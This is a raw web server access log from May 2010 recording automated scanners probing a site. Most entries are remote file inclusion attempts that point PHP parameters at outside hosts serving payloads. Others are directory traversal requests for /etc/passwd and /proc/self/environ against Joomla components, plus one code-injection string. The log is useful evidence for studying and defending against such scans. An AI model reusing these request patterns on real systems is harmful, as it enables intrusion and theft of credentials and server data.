195.225.170.200 - - [11/May/2010:04:00:52 -0500] "GET /logs/access_log.1270857600//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:04:00:53 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:04:00:53 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
217.172.150.13 - - [11/May/2010:04:01:26 -0500] "GET /logs/access_log.1270857600//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 331 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:04:01:27 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:04:01:27 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.825"
194.108.112.112 - - [11/May/2010:04:02:58 -0500] "GET /logs/access_log.1270857600//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:04:02:59 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:04:02:59 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
217.169.241.213 - - [11/May/2010:04:03:11 -0500] "GET /logs/access_log.1270857600//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
217.169.241.213 - - [11/May/2010:04:03:11 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
217.169.241.213 - - [11/May/2010:04:03:12 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:04:03:31 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:04:03:31 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:04:07:18 -0500] "GET /logs/access_log.1270857600//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:04:07:18 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:04:07:19 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
119.235.18.119 - - [11/May/2010:04:11:04 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
124.0.74.195 - - [11/May/2010:04:11:06 -0500] "GET //index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:04:11:06 -0500] "GET /logs/access_log.1215993600//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:04:11:06 -0500] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:04:11:47 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
124.0.74.195 - - [11/May/2010:04:14:02 -0500] "GET //index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:04:14:02 -0500] "GET /logs/access_log.1219968000%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:04:14:02 -0500] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
205.134.238.142 - - [11/May/2010:04:18:19 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
67.195.112.180 - - [11/May/2010:04:18:34 -0500] "GET /logs/access_log.1244937600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.198.24 - - [11/May/2010:04:19:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.174.62.150 - - [11/May/2010:04:21:11 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.808"
211.174.62.150 - - [11/May/2010:04:21:12 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.808"
67.195.112.180 - - [11/May/2010:04:22:58 -0500] "GET /logs/access_log.1172620800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.200 - - [11/May/2010:04:23:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:04:27:13 -0500] "GET /logs/access_log.1240185600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.217.229.185 - - [11/May/2010:04:28:34 -0500] "GET /logs/access_log.1272067200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
124.217.229.185 - - [11/May/2010:04:28:35 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
124.217.229.185 - - [11/May/2010:04:28:35 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5130 "-""libwww-perl/5.810"
216.127.70.140 - - [11/May/2010:04:30:26 -0500] "GET //home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
91.103.220.36 - - [11/May/2010:04:30:41 -0500] "GET //home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.29.80.127 - - [11/May/2010:04:31:15 -0500] "GET //home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.64.52.86 - - [11/May/2010:04:31:31 -0500] "GET /logs//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
69.64.52.86 - - [11/May/2010:04:31:31 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
205.134.238.142 - - [11/May/2010:04:31:41 -0500] "GET /logs/access_log.1273276800//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
205.134.238.142 - - [11/May/2010:04:31:41 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
205.134.238.142 - - [11/May/2010:04:31:41 -0500] "GET /logs//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
69.64.52.86 - - [11/May/2010:04:32:27 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
174.123.124.82 - - [11/May/2010:04:32:45 -0500] "GET //home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.831"
205.134.238.142 - - [11/May/2010:04:34:12 -0500] "GET /logs/access_log.1272067200//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
195.228.152.176 - - [11/May/2010:04:34:48 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
217.169.241.213 - - [11/May/2010:04:35:01 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
194.108.112.112 - - [11/May/2010:04:35:04 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
195.128.158.108 - - [11/May/2010:04:35:52 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://188.40.154.216/webalizer/ide.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.833"
195.128.158.108 - - [11/May/2010:04:35:52 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://188.40.154.216/webalizer/ide.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.833"
195.128.158.108 - - [11/May/2010:04:35:52 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://188.40.154.216/webalizer/ide.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.833"
195.225.170.200 - - [11/May/2010:04:36:57 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.20 - - [11/May/2010:04:38:57 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:04:38:57 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:04:38:57 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:04:39:01 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:04:39:01 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:04:39:01 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
96.30.32.26 - - [11/May/2010:04:39:03 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
96.30.32.26 - - [11/May/2010:04:39:03 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
96.30.32.26 - - [11/May/2010:04:39:03 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:04:39:13 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:04:39:13 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:04:39:13 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:04:39:22 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:04:39:22 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:04:39:23 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.46.199.188 - - [11/May/2010:04:39:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.127.70.140 - - [11/May/2010:04:39:49 -0500] "GET /logs/access_log.1268956800//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.65"
217.172.150.13 - - [11/May/2010:04:39:49 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
216.127.70.140 - - [11/May/2010:04:39:50 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
216.127.70.140 - - [11/May/2010:04:39:50 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
206.212.244.82 - - [11/May/2010:04:39:50 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:04:39:50 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:04:39:50 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
96.30.32.26 - - [11/May/2010:04:39:53 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
96.30.32.26 - - [11/May/2010:04:39:53 -0500] "GET /logs/access_log.1270598400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
96.30.32.26 - - [11/May/2010:04:39:53 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:04:40:46 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:04:40:46 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:04:40:46 -0500] "GET /logs/access_log.1270598400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:04:40:56 -0500] "GET /logs/access_log.1268784000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.221.130.20 - - [11/May/2010:04:41:09 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:04:41:09 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:04:41:09 -0500] "GET /logs/access_log.1270598400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:04:41:43 -0500] "GET /logs/access_log.1270598400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:04:41:43 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:04:41:44 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
69.64.52.86 - - [11/May/2010:04:44:10 -0500] "GET /logs/access_log.1237852800//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
69.64.52.86 - - [11/May/2010:04:44:10 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
69.64.52.86 - - [11/May/2010:04:44:10 -0500] "GET /logs//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
69.64.52.86 - - [11/May/2010:04:44:13 -0500] "GET /logs/access_log.1242432000//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
210.50.189.221 - - [11/May/2010:04:46:27 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.94.64.154 - - [11/May/2010:04:47:48 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:04:47:48 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:04:47:48 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.123.124.82 - - [11/May/2010:04:52:18 -0500] "GET /logs/access_log.1213833600//home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.831"
174.123.124.82 - - [11/May/2010:04:52:18 -0500] "GET //home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.123.124.82 - - [11/May/2010:04:52:19 -0500] "GET /logs//home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.831"
91.103.220.36 - - [11/May/2010:04:52:24 -0500] "GET /logs/access_log.1213833600//home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:04:52:25 -0500] "GET //home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:04:52:25 -0500] "GET /logs//home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
195.225.170.200 - - [11/May/2010:04:52:44 -0500] "GET /logs/access_log.1213833600//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:04:52:44 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:04:52:44 -0500] "GET /logs//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:04:53:34 -0500] "GET /logs/access_log.1213833600//home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:04:53:34 -0500] "GET //home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:04:53:34 -0500] "GET /logs//home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [11/May/2010:04:54:39 -0500] "GET /logs/access_log.1223078400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [11/May/2010:04:54:46 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.236.43.200 - - [11/May/2010:04:54:50 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:54:57 -0500] "GET /logs/access_log.1273190400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:54:58 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:54:58 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:55:27 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.127.70.140 - - [11/May/2010:04:55:38 -0500] "GET /logs/access_log.1213833600//home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
216.127.70.140 - - [11/May/2010:04:55:38 -0500] "GET //home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [11/May/2010:04:55:38 -0500] "GET /logs//home.php?action=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
114.108.151.149 - - [11/May/2010:04:55:53 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
92.42.216.103 - - [11/May/2010:04:57:22 -0500] "GET /logs/access_log.1213833600//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.42.216.103 - - [11/May/2010:04:57:22 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.42.216.103 - - [11/May/2010:04:57:23 -0500] "GET /logs//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:57:23 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.236.43.200 - - [11/May/2010:04:57:40 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:57:47 -0500] "GET /logs/access_log.1273190400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:57:48 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:57:48 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
123.30.181.5 - - [11/May/2010:04:58:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.30.181.5 - - [11/May/2010:04:58:45 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
123.30.181.5 - - [11/May/2010:04:58:45 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.36.1.97 - - [11/May/2010:04:59:03 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
114.108.151.149 - - [11/May/2010:04:59:28 -0500] "GET /logs/access_log.1273190400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:59:28 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:04:59:29 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.228.152.176 - - [11/May/2010:04:59:47 -0500] "GET /logs/access_log.1270857600//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
195.228.152.176 - - [11/May/2010:04:59:47 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
195.228.152.176 - - [11/May/2010:04:59:47 -0500] "GET /logs//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
